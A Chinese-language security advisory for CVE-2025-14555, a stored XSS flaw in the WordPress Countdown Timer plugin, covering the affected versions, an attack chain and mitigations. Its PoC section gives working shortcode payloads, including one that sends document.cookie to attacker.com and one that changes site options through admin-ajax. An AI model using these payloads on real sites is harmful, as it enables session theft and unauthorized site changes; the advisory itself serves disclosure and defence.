CVE-2025-14555 WordPress Countdown Timer插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14555

漏洞类型

存储型XSS (Stored Cross-Site Scripting)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Countdown Timer – Widget Countdown (WordPress插件)

漏洞概述

CVE-2025-14555是WordPress平台下Countdown Timer插件的一个高危安全漏洞。该插件是一款广受欢迎的倒计时计时器小部件，被大量WordPress网站用于展示活动倒计时、产品发布倒计时等功能。漏洞根源在于插件对用户通过短代码(Shortcode)传入的属性参数缺乏有效的输入过滤和输出转义处理。攻击者只需拥有WordPress网站的贡献者(Contributor)级别权限，即可利用wpdevart_countdown短代码注入恶意JavaScript脚本。这些恶意脚本会被永久存储在数据库中，当其他用户访问包含该短代码的页面时，注入的脚本会自动执行，可能导致会话劫持、凭据窃取、恶意重定向等严重后果。由于该漏洞属于存储型XSS，攻击面覆盖所有访问受影响页面的用户，危害范围较广。

技术细节

漏洞存在于插件的front_end.php文件中的短代码处理逻辑。具体来说，插件在处理wpdevart_countdown短代码时，直接将用户提供的属性参数输出到HTML页面，而未进行充分的输入验证和输出编码。以第30、48、167行代码为例，插件接收类似[wpdevart_countdown year='2024' month='12' day='25']的短代码调用，但未能对year、month、day等参数进行XSS安全过滤。攻击者可构造如下恶意短代码：[wpdevart_countdown year='2024<script>alert(document.cookie)</script>' month='12' day='25']，其中的<script>标签会被直接嵌入到页面HTML中。由于WordPress的短代码会在页面加载时自动解析执行，存储在数据库中的恶意脚本将对所有访问者生效。攻击者利用此漏洞可窃取管理员cookie、修改页面内容或进行钓鱼攻击。

攻击链分析

STEP 1

1. 侦察阶段

攻击者识别目标网站使用的WordPress版本及Countdown Timer插件版本，确认版本<=2.7.7存在漏洞

STEP 2

2. 初始访问

攻击者通过钓鱼、社会工程或弱口令等方式获取WordPress网站的Contributor或更高权限账户

STEP 3

3. 漏洞利用

在文章或页面编辑界面，插入包含恶意JavaScript代码的wpdevart_countdown短代码参数

STEP 4

4. 持久化

发布/更新文章后，恶意脚本随页面内容永久存储在WordPress数据库中

STEP 5

5. 触发执行

当普通用户或管理员访问包含该短代码的页面时，浏览器解析HTML并执行注入的JavaScript

STEP 6

6. 恶意行为

根据攻击者意图，脚本可执行窃取Cookie、会话劫持、页面篡改或进一步横向移动等操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-14555 PoC - WordPress Countdown Timer XSS // Author: [email protected] // Affected: Countdown Timer – Widget Countdown <= 2.7.7 // Method 1: Basic XSS via shortcode attribute injection [wpdevart_countdown year='2025<script>alert("XSS")</script>' month='12' day='25'] // Method 2: Cookie stealing PoC [wpdevart_countdown year='2025<img src=x onerror=fetch("https://attacker.com/log?c="+document.cookie)>' month='12' day='25'] // Method 3: Session hijacking via stored script [wpdevart_countdown year='2025<script>fetch("/wp-admin/admin-ajax.php",{method:"POST",body:"action=update_options&option_name=users_can_register&option_value=1"}).then(()=>location.href="/wp-login.php?action=register")</script>' month='12' day='25'] // Exploitation steps: // 1. Attacker needs Contributor-level WordPress access // 2. Create or edit any post/page // 3. Insert malicious shortcode // 4. Publish/update the content // 5. Any user visiting the page will execute the injected script

影响范围

Countdown Timer – Widget Countdown <= 2.7.7

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 临时禁用Countdown Timer插件并使用其他替代方案；2) 通过Web应用防火墙(WAF)规则阻止包含<script>标签的短代码请求；3) 限制低权限用户(Contributor/Author)发布文章的权限，仅允许管理员级别用户创建内容；4) 在WordPress配置中添加自定义过滤器，对wpdevart_countdown短代码参数进行强制转义处理。